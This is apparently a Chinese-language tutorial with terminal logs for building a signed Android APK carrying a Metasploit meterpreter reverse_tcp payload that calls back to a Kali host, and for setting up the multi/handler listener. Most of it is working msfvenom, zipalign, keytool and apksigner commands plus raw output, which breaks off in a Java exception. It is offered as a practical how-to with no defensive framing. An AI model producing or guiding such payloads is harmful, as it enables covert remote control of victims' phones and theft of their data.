1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。
lhost=192.168.183.12 (这是Kali的IP)lport=55555 (默认4444,可以自定义)
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk
这样,一个很简单的带有payload(攻击载荷)的安卓应用就生成好了。ls -l看一下,在当前目录下有个t.apk文件。
很多同学看百度搜索到的教程都是到这里就直接丢到安卓手机里安卓了,然后就一值连不上。。。那是上古时期的教程了,咱们身边都没有这么老旧的手机。在这里,我们还要对t.apk文件进行优化对齐然后签名。
需要用到的软件有三个,zipalign, keytool , apksigner。
Kali 2020只默认安装了一个keytool,有些教程里提到jarsigner,实际上kali2020已经没有这个了,软件源里也没有,ap-get install jarsigner也会提示没有这个软件。这是apk应用V1签名需要的工具。我这里用apksigner的V2签名,V1和V2的签名流程不同,请勿生搬硬套。
这部分的知识想理解的,建议百度搜索zipalign
2,使用zipalign对apk进行对齐
zipalign -v 4 t.apk tz.apk
3,生成密钥对生成密钥对:keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000解释:keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -validity 天数 -keyalg RSA
4,对apk签名签名:apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk解释:apksigner sign --ks 密钥库名 --ks-key-alias 密钥别名 tz.apk
5,对apk进行签名验证apksigner verify -v --print-certs tz.apk
到这里,基本就可以了。最后生成的文件tz.apk就是我们要的安卓应用
安卓控制全部root@kali:~# msfconsolemsf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > optionsModule options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 55555 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf5 exploit(multi/handler) > set lhost 192.168.183.12lhost => 192.168.183.12msf5 exploit(multi/handler) > exploit[-] Handler failed to bind to 192.168.183.12:55555:- -[*] Started reverse TCP handler on 0.0.0.0:4444
生成apk阶段全部生成apk阶段全部rootkali)-[/home/kali/Desktop]└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload[-] No arch selected, selecting arch: dalvik from the payloadNo encoder specified, outputting raw payloadPayload size: 10190 bytes ┌──(rootkali)-[/home/kali/Desktop]└─# zipalign -v 4 t.apk tz.apkCommand 'zipalign' not found, but can be installed with:apt install zipalignDo you want to install it? (N/y)yapt install zipalignReading package lists..、DoneBuilding dependency tree..、DoneReading state information..、DoneThe following additional packages will be installed: android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1The following NEW packages will be installed: android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1 zipalign0 upgraded, 9 newly installed, 0 to remove and 567 not upgraded.Need to get 548 kB of archives.After this operation, 1,726 kB of additional disk space will be used.Do you want to continue? [Y/n] yGet:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libunwind amd64 10.0.0+r36-4 [48.3 kB]Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbacktrace amd64 1:10.0.0+r36-7 [153 kB]Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libutils amd64 1:10.0.0+r36-7 [62.4 kB]Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libziparchive amd64 1:10.0.0+r36-7 [35.5 kB]Get:8 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libzopfli1 amd64 1.0.3-1 [101 kB]Get:9 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 zipalign amd64 1:10.0.0+r36-1 [28.2 kB]Fetched 548 kB in 1s (449 kB/s)Selecting previously unselected package android-liblog.(Reading database ..、268182 files and directories currently installed.)Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-liblog (1:10.0.0+r36-7) ...Selecting previously unselected package android-libbase.Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libbase (1:10.0.0+r36-7) ...Selecting previously unselected package android-libunwind.Preparing to unpack .../2-android-libunwind_10.0.0+r36-4_amd64.deb ...Unpacking android-libunwind (10.0.0+r36-4) ...Selecting previously unselected package android-libbacktrace.Preparing to unpack .../3-android-libbacktrace_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libbacktrace (1:10.0.0+r36-7) ...Selecting previously unselected package android-libcutils.Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libcutils (1:10.0.0+r36-7) ...Selecting previously unselected package android-libutils.Preparing to unpack .../5-android-libutils_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libutils (1:10.0.0+r36-7) ...Selecting previously unselected package android-libziparchive.Preparing to unpack .../6-android-libziparchive_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libziparchive (1:10.0.0+r36-7) ...Selecting previously unselected package libzopfli1.Preparing to unpack .../7-libzopfli1_1.0.3-1_amd64.deb ...Unpacking libzopfli1 (1.0.3-1) ...Selecting previously unselected package zipalign.Preparing to unpack .../8-zipalign_1%3a10.0.0+r36-1_amd64.deb ...Unpacking zipalign (1:10.0.0+r36-1) ...Setting up android-liblog (1:10.0.0+r36-7) ...Setting up libzopfli1 (1.0.3-1) ...Setting up android-libunwind (10.0.0+r36-4) ...Setting up android-libbase (1:10.0.0+r36-7) ...Setting up android-libziparchive (1:10.0.0+r36-7) ...Setting up android-libcutils (1:10.0.0+r36-7) ...Setting up android-libbacktrace (1:10.0.0+r36-7) ...Setting up android-libutils (1:10.0.0+r36-7) ...Setting up zipalign (1:10.0.0+r36-1) ...Processing triggers for libc-bin (2.32-4) ...Processing triggers for man-db (2.9.4-2) ...Processing triggers for kali-menu (2021.4.2) ... ┌──(rootkali)-[/home/kali/Desktop]└─# keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000Enter keystore password: Re-enter new password: What is your first and last name? [Unknown]: jacksonWhat is the name of your organizational unit? [Unknown]: jacksonWhat is the name of your organization? [Unknown]: jacksonWhat is the name of your City or Locality? [Unknown]: jacksonWhat is the name of your State or Province? [Unknown]: jacksonWhat is the two-letter country code for this unit? [Unknown]: 22Is CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22 correct? [no]: yGenerating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days for: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22[Storing cg.keystore] ┌──(rootkali)-[/home/kali/Desktop]└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apkCommand 'apksigner' not found, but can be installed with:apt install apksignerDo you want to install it? (N/y)yapt install apksignerReading package lists..、DoneBuilding dependency tree..、DoneReading state information..、DoneThe following additional packages will be installed: libapksig-javaThe following NEW packages will be installed: apksigner libapksig-java0 upgraded, 2 newly installed, 0 to remove and 567 not upgraded.Need to get 847 kB of archives.After this operation, 980 kB of additional disk space will be used.Do you want to continue? [Y/n] yGet:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB]Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB]Fetched 847 kB in 1s (1,115 kB/s)Selecting previously unselected package libapksig-java.(Reading database ..、268245 files and directories currently installed.)Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ...Unpacking libapksig-java (31.0.2-1) ...Selecting previously unselected package apksigner.Preparing to unpack .../apksigner_31.0.2-1_all.deb ...Unpacking apksigner (31.0.2-1) ...Setting up libapksig-java (31.0.2-1) ...Setting up apksigner (31.0.2-1) ...Processing triggers for kali-menu (2021.4.2) ...Processing triggers for man-db (2.9.4-2) ... ┌──(rootkali)-[/home/kali/Desktop]└─# apksigner verify -v --print-certs tz.apk 127 ⨯Exception in thread "main" java.io.FileNotFoundException: tz.apk (No such file or directory) at java.base/java.io.RandomAccessFile.open0(Native Method) at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345) at java.base/java.io.RandomAccessFile.